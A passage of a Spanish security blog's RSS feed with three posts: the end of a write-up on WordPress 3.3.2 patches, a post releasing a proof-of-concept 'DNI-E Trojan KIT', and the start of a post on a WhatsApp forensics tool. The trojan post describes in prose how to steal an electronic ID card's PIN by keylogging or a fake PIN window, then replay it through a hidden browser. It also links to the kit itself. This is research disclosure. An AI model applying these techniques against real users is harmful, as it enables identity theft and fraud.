&lt;li style="text-align: justify;"&gt;&lt;b&gt;CVE-2012-2404 - &lt;/b&gt;Se actualiza el fichero&amp;nbsp;&lt;i&gt;&lt;a href="http://core.trac.wordpress.org/changeset?new=20554@branches/3.3&amp;amp;old=20087@branches/3.3#file1"&gt;wp-comments-post.php&lt;/a&gt;, &lt;/i&gt;que incluía una redirección a una variable $location de forma insegura, mediante una función propia de wordpress &lt;i&gt;&lt;a href="http://codex.wordpress.org/Function_Reference/wp_redirect"&gt;wp_redirect()&lt;/a&gt;.&lt;/i&gt; Como actualización, se sustituye el uso de dicha función por otra, llamada &lt;a href="http://codex.wordpress.org/Function_Reference/wp_safe_redirect"&gt;&lt;i&gt;wp_safe_redirect()&lt;/i&gt;&lt;/a&gt;, que incluye comprobaciones y realiza la redirección local de forma más segura.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-pC_KLEBcz1A/T7SGD5eXxhI/AAAAAAAABEg/GgBT4UCYiuI/s1600/redirect-wp-upd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="92" src="http://2.bp.blogspot.com/-pC_KLEBcz1A/T7SGD5eXxhI/AAAAAAAABEg/GgBT4UCYiuI/s400/redirect-wp-upd.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
Si bien no se trata de vulnerabilidades muy críticas, debido a su posible explotación remota se recomienda &lt;a href="http://wordpress.org/download/"&gt;&lt;b&gt;actualizar Wordpress a su versión 3.3.2&lt;/b&gt; ya disponible.&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-4299264138072831442?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/7GjyQRfV00o" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/7GjyQRfV00o/analizando-las-vulnerabilidades-remotas.html</link><author>noreply@blogger.com (José A. Guasch)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-vMdkmkmAUnQ/TyDpAStsMbI/AAAAAAAAA6w/SIk0dFB3p3k/s72-c/logo-wordpress.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/analizando-las-vulnerabilidades-remotas.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-8976182561907675022</guid><pubDate>Wed, 16 May 2012 05:49:00 +0000</pubDate><atom:updated>2012-05-16T07:49:18.012+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">dni electronico</category><category domain="http://www.blogger.com/atom/ns#">troyano</category><title>DNI-E Trojan KIT 1.0</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-Xx4cq8EUeHg/T7Lg1e8vRjI/AAAAAAAABW0/uDhacP45JVM/s1600/dnie.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="131" src="http://4.bp.blogspot.com/-Xx4cq8EUeHg/T7Lg1e8vRjI/AAAAAAAABW0/uDhacP45JVM/s200/dnie.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El pasado marzo durante la RootedCon, &lt;a href="http://www.securitybydefault.com/2012/04/applied-cryptography-fails-rootedcon.html"&gt;presenté un prototipo de troyano&lt;/a&gt; que involucraba el uso fraudulento del Dni Electrónico.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
EL concepto es simple: El DNIe como tal es prácticamente inviolable (acceso a las claves privadas, etc) pero en el momento que tiene que trabajar dentro de un sistema operativo, se vuelve vulnerable &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Como expliqué en el turno de preguntas, mi intención era hacer algo basado enteramente en el API de windows, sin emplear hooking ni módulos en el Kernel.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hoy libero el prototipo del troyano y explicaré su funcionamiento. Hay que destacar que el comportamiento es 'de troyano' pero no efectúa nada dañino. &lt;b&gt;El objetivo es conectarse a la web de la DGT y extraer el saldo de puntos del poseedor del DNI&lt;/b&gt; &lt;b&gt;de forma automatizada&lt;/b&gt;. &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El primer paso es robar el PIN. Para este propósito el troyano utiliza dos métodos:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Keylogging&lt;/b&gt;: Es el método mas obvio, el DNIe como tal no aporta ningún tipo de seguridad frente a este tipo de ataques ya que 'caen' en la capa del sistema operativo. Tampoco el software que acompaña al DNIe ofrece ningún tipo de protección.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Obviamente no vale cualquier keylogger, hay que afinar el tiro y saber exactamente cuando logear.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para ello tenemos que localizar exactamente cuando aparece la ventana que solicita el PIN del DNIe y logear las pulsaciones mientras está presente.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Windows tiene la función perfecta para ello: &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms633499%28v=vs.85%29.aspx"&gt;FindWindow()&lt;/a&gt;. Esta función permite localizar cualquier ventana buscándola por su 'caption'. Para averiguar cual es el caption de la ventana del DNIe, podemos usar un programa como &lt;a href="http://www.catch22.net/software/winspy-17"&gt;WinSpy++&lt;/a&gt; que permite obtener los datos de cualquier ventana. &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por lo tanto, el troyano lo que hace es quedar a la espera hasta que aparece esa ventana y, cuando aparece, usa la función &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms646293%28v=vs.85%29.aspx"&gt;GetAsyncKeyState()&lt;/a&gt; para obtener las pulsaciones del teclado.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hay que señalar que falta por pulir bastante esta funcionalidad del troyano, ya que en estos momentos solo captura combinaciones tecla / número y no combinaciones del tipo @#$%, tampoco discrimina mayúsculas / minúsculas. Como prueba de concepto es suficiente, en sucesivas actualizaciones mejoraré este método.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;IntraPhishing&lt;/b&gt;: Este método es mucho mas 'divertido' y se basa en un hecho que todo usuario del DNIe conoce bien: &lt;b&gt;la cantidad de veces que sale la ventana de solicitud del PIN&lt;/b&gt;. Es muy frecuente y muy normal verla aparecer una y otra vez, lo que me lleva a plantearme la idea de: ¿Y si le envío al usuario una ventana idéntica de solicitud de PIN, pero controlada por mi? El resultado, probablemente, sea que el usuario meta su PIN y nos lo entregue en bandeja. Muy al estilo del Phishing tradicional cuando una web clona a otra.&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/--u-w5Cgznr4/T7L_ew4j25I/AAAAAAAABXI/lhZYEuCVsnM/s1600/fake.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="131" src="http://2.bp.blogspot.com/--u-w5Cgznr4/T7L_ew4j25I/AAAAAAAABXI/lhZYEuCVsnM/s320/fake.JPG" width="320" /&gt;&amp;nbsp;&lt;/a&gt;&lt;/td&gt;&lt;td style="text-align: center;"&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Fake&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Una vez el usuario introduzca el PIN, estará bajo nuestro control y podemos proceder a la siguiente fase.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Con el PIN en la mano, el siguiente paso es conectar a la web de la DGT para solicitar el saldo de puntos. La URL que nos lleva a ello es esta https://aplcr.dgt.es/WEB_COPACI/certificado/irAntecedentes.faces&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para llegar a ella vamos a usar Internet Explorer y su objeto OLE &lt;a href="http://msdn.microsoft.com/en-us/library/aa752084%28v=vs.85%29.aspx"&gt;InternetExplorer.Application&lt;/a&gt; &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para el que no lo sepa, Internet Explorer (así como otros muchos programas) ponen a disposición del desarrollador lo que se denominan 'Objetos OLE/COM' que permiten automatizar tareas de forma desatendida. En el caso de Explorer, queremos que navegue hacia la web de la DGT.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Antes de eso, y dado que va a haber actividad en la pantalla del PC, es necesario que el troyano 'espere' a que el PC esté inactivo para realizar la navegación (van a verse las ventanas de solicitud del PIN) para ello usaremos la función &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms646302%28v=vs.85%29.aspx"&gt;GetLastInputInfo()&lt;/a&gt; que permite determinar el tiempo que un PC ha estado inactivo. En el caso del troyano, viene configurado para 6 segundos, obviamente en un escenario real, sería necesario una ventana de tiempo mayor.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Una vez el PC esté desatendido, el troyano instancia un Internet Explorer cuya ventana está oculta, y navega hacia la web de la DGT.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Problema: Vamos a necesitar rellenar varias veces la ventana de solicitud del PIN.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Solución: Lanzamos un hilo que constantemente esté buscando la ventana del DNIe y cuando aparezca, enviamos el PIN (que ya tenemos) haciendo uso de la función &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms646310%28v=vs.85%29.aspx"&gt;SendInput()&lt;/a&gt; que permite simular las pulsaciones del teclado.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Una vez completado el proceso, el troyano 'parsea' la respuesta de la web de la DGT y obtiene el saldo de puntos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Aquí podéis ver un vídeo del troyano en acción con el modo IntraPhishing&lt;/div&gt;
&lt;br /&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="480" src="http://www.youtube.com/embed/n9KTo3IQ9Yg" width="640"&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Cabe destacar que si bien este 'kit' está adaptado al DNIe, usando estas mismas técnicas se podría atacar cualquier otra SmartCard.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En este ejemplo tan solo se ha obtenido una información más o menos confidencial pero se podría adaptar para, por ejemplo, obtener la declaración de la renta o modificar los datos fiscales &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Podéis descargar 'DNI-E Trojan KIT' &lt;a href="http://sbdtools.googlecode.com/files/DnieTrojanKit.zip"&gt;desde aquí &lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-8976182561907675022?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/1OiJxqw334Y" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/1OiJxqw334Y/dni-e-trojan-kit-10.html</link><author>noreply@blogger.com (Yago Jesus)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-Xx4cq8EUeHg/T7Lg1e8vRjI/AAAAAAAABW0/uDhacP45JVM/s72-c/dnie.jpg" height="72" width="72" /><thr:total>16</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/dni-e-trojan-kit-10.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-5734172745961513929</guid><pubDate>Tue, 15 May 2012 06:30:00 +0000</pubDate><atom:updated>2012-05-15T08:30:00.065+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">whatsapp</category><category domain="http://www.blogger.com/atom/ns#">herramientas</category><category domain="http://www.blogger.com/atom/ns#">contribuciones</category><category domain="http://www.blogger.com/atom/ns#">iphone</category><category domain="http://www.blogger.com/atom/ns#">android</category><category domain="http://www.blogger.com/atom/ns#">análisis forense</category><title>WhatsApp Forensics</title><description>&lt;div class="separator" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"&gt;
&lt;img border="0" height="200" src="http://2.bp.blogspot.com/-memb_UZcyA4/T6FPYWWH1AI/AAAAAAAAAAM/EGzwgWbmYvA/s200/logo2.png" width="135" /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Siguiendo la línea de algunos posts sobre la aplicación &lt;a href="http://www.securitybydefault.com/search/label/whatsapp" target="_blank"&gt;WhatsApp&lt;/a&gt; (que de seguro todos conocemos), en este post me gustaría presentaros una herramienta para facilitar la extracción e interpretación de los datos generados por esta aplicación.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;Si bien es cierto que la aplicación cifra los logs de los mensajes cuando realiza el backup en la sdcard, todos estos registros así como las conversaciones actuales, agenda de contactos y demás ficheros propios de la aplicación, se encuentran sin cifrar en la memoria interna del dispositivo, de tal forma, que accediendo a la memoria del dispositivo podremos extraer dichos ficheros para analizarlos en otro entorno.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;La aplicación que me gustaría presentaros está escrita en Python (DJango) y aunque es una versión Beta y espero poder seguir agregándole más funcionalidades, nos facilitará bastante la tarea a la hora de interpretar la información basándose en los registros de los siguientes ficheros: &lt;/div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;wa.db&lt;/b&gt; (agenda de contactos)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;msgstore.db&lt;/b&gt; (conversaciones actuales)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;i&gt;whatsapp-YYYY-MM-DD.log.gz &lt;/i&gt;(registro de conversaciones)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;i&gt;msgstore-YYYY-MM-DD.X.db.crypt&lt;/i&gt; (registro de conversaciones cifrado) &lt;/li&gt;
&lt;/ul&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-INNqxoDnDag/T6MQRiKhBPI/AAAAAAAAAAg/PAXPj2iSdV8/s1600/img1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="202" src="http://1.bp.blogspot.com/-INNqxoDnDag/T6MQRiKhBPI/AAAAAAAAAAg/PAXPj2iSdV8/s640/img1.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Listado de archivos de interés&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;i&gt;Nota:&lt;/i&gt;&lt;/b&gt; Como registro de mensajes solo se usará &lt;i&gt;msgstore.db&lt;/i&gt;, pero podemos reemplazar este archivo por cualquiera de los registros de mensajes guardados.  Para descargar la aplicación, podemos hacerlo desde la &lt;a href="https://github.com/sch3m4/wforensic" target="_blank"&gt;URL&lt;/a&gt; del proyecto descargando el fichero &lt;a href="https://github.com/sch3m4/wforensic/downloads" target="_blank"&gt;zip/tgz&lt;/a&gt; o clonando el repositorio: &lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
~$ git clone git://github.com/sch3m4/wforensic.git Cloning into 'wforensic'... remote: Counting objects: 136, done. remote: Compressing objects: 100% (117/117), done. remote: Total 136 (delta 11), reused 135 (delta 10) Receiving objects: 100% (136/136), 364.66 KiB | 163 KiB/s, done. Resolving deltas: 100% (11/11), done. ~$&amp;nbsp;&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
Una vez hecho esto, entramos en el directorio creado y copiamos en él los ficheros &lt;b&gt;wa.db&lt;/b&gt; y &lt;b&gt;msgstore.db&lt;/b&gt;: &lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
~$ cd wforensic/ ~/wforensic$ cp -v /tmp/*.db . `/tmp/msgstore.db' -&amp;gt; `./msgstore.db' `/tmp/wa.db' -&amp;gt; `./wa.db' ~/wforensic$ ls -1 CHANGELOG LICENSE README msgstore.db tools wa.db wforensic ~/wforensic$&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
En caso de necesitar utilizar un registro de log, procederemos de la misma manera, descomprimiendo el fichero: &lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
~$ gzip -d whatsapp-2012-05-03.1.log.gz ~$ mv whatsapp-2012-05-03.1.log wforensic/msgstore.db ~$&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
Hecho esto, podemos iniciar la aplicación y acceder al navegador accediendo al puerto correspondiente, que por defecto es el 8000:  &lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-PEWr5gST4Lg/T6hRubWcjkI/AAAAAAAAAA0/i86zEezouOc/s1600/runserver.png" style="margin-left: auto; margin-right: auto;" /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Ejecutando el servidor DJango&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;Hecho esto, si accedemos a la URL especificada podremos ver como página principal un breve resumen de la actividad:  &lt;/div&gt;
&lt;table border="0px" style="text-align: justify;"&gt;&lt;tbody&gt;
&lt;tr&gt; &lt;td&gt;&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Wd2jxv_1AtE/T6hU7h7AFLI/AAAAAAAAABI/Tnx818YAh5A/s1600/init0.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="306" src="http://2.bp.blogspot.com/-Wd2jxv_1AtE/T6hU7h7AFLI/AAAAAAAAABI/Tnx818YAh5A/s320/init0.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Index (1/2)&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt; &lt;td&gt;&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-7j8geYiqLcY/T6hW49Gy9gI/AAAAAAAAABQ/YoPdfJt9JmA/s1600/init1.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="301" src="http://1.bp.blogspot.com/-7j8geYiqLcY/T6hW49Gy9gI/AAAAAAAAABQ/YoPdfJt9JmA/s320/init1.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Index (2/2)&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Si por el contrario, solo tenemos acceso a los ficheros cifrados, podemos usar el script "&lt;b&gt;tools/decrypt.py&lt;/b&gt;" (gracias al &lt;a href="http://www.securitybydefault.com/2012/05/descifrando-el-fichero-msgstoredbcrypt.html" target="_blank"&gt;post&lt;/a&gt; de Alejandro Ramos):  &lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: justify;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-OGgxjceNGQU/T6hfiuM-lLI/AAAAAAAAABo/n1dUmBhUgdM/s1600/decrypt.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="219" src="http://1.bp.blogspot.com/-OGgxjceNGQU/T6hfiuM-lLI/AAAAAAAAABo/n1dUmBhUgdM/s640/decrypt.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Volcando y descifrando un registro de mensajes desde la sdcard.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Ahora volvemos a acceder a la aplicación y navegar por todos sus apartados para revisar el registro descifrado:  &lt;/div&gt;
&lt;table border="0px" style="text-align: justify;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-AL4g9dUOiyg/T6hkLRw4TII/AAAAAAAAAB8/YF83YS8kIa4/s1600/contacts.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="307" src="http://3.bp.blogspot.com/-AL4g9dUOiyg/T6hkLRw4TII/AAAAAAAAAB8/YF83YS8kIa4/s320/contacts.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Contactos&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt; &lt;td&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ZRCWA3KXxXQ/T6hibta-vZI/AAAAAAAAAB0/9OMT8HR-LWo/s1600/init2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="235" src="http://2.bp.blogspot.com/-ZRCWA3KXxXQ/T6hibta-vZI/AAAAAAAAAB0/9OMT8HR-LWo/s320/init2.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Página Principal&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
En la parte de "Contacts" (como en el resto de la aplicación) se muestran tanto los contactos con WhatsApp como los que no. Cuando un contacto tiene WhatsApp instalado en su dispositivo, aparecerá con el icono (como se muestra) al lado del nombre, el número de mensajes intercambiados y un enlace en su número de teléfono para mostrar la conversación.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En el menú superior de la aplicación, aparecen secciones para ver la lista de contactos, los chats mantenidos, mostrar los mensajes con coordenadas GPS, mensajes con contenido multimedia, etc.  Cuando un mensaje posee algún tipo de adjunto (imagen, contacto, coordenadas, etc.) a demás de mostrar el thumbnail del contenido, nos  aparecerá un icono al lado del nombre del contacto, con la URL al  contenido original, (en el caso de las coordenadas GPS, será un enlace a  Google Maps).  Y para sorpresa (o no) de muchos, esto es lo que pasa cuando accedemos a la URL original:  &lt;/div&gt;
&lt;table border="0px" style="text-align: justify;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-WL0EtpcYOMM/T6hm7fL0uwI/AAAAAAAAACI/bpkGugxZNRc/s1600/media.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="212" src="http://2.bp.blogspot.com/-WL0EtpcYOMM/T6hm7fL0uwI/AAAAAAAAACI/bpkGugxZNRc/s320/media.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Mensajes multimedias&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt;  &lt;td&gt;&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-D0xWwrhHxwQ/T6hol8Nxc-I/AAAAAAAAACQ/w75bHtWUrcs/s1600/orig.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-D0xWwrhHxwQ/T6hol8Nxc-I/AAAAAAAAACQ/w75bHtWUrcs/s320/orig.png" width="296" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Contenido original&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Y finalizando, dos capturas para ver cómo se muestra el listado de chat y las conversaciones:  &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table border="0px" style="text-align: justify;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-0n3VfwzHJ_4/T6hte9W40xI/AAAAAAAAACk/q_BnEusVYks/s1600/conv.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="297" src="http://2.bp.blogspot.com/-0n3VfwzHJ_4/T6hte9W40xI/AAAAAAAAACk/q_BnEusVYks/s320/conv.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
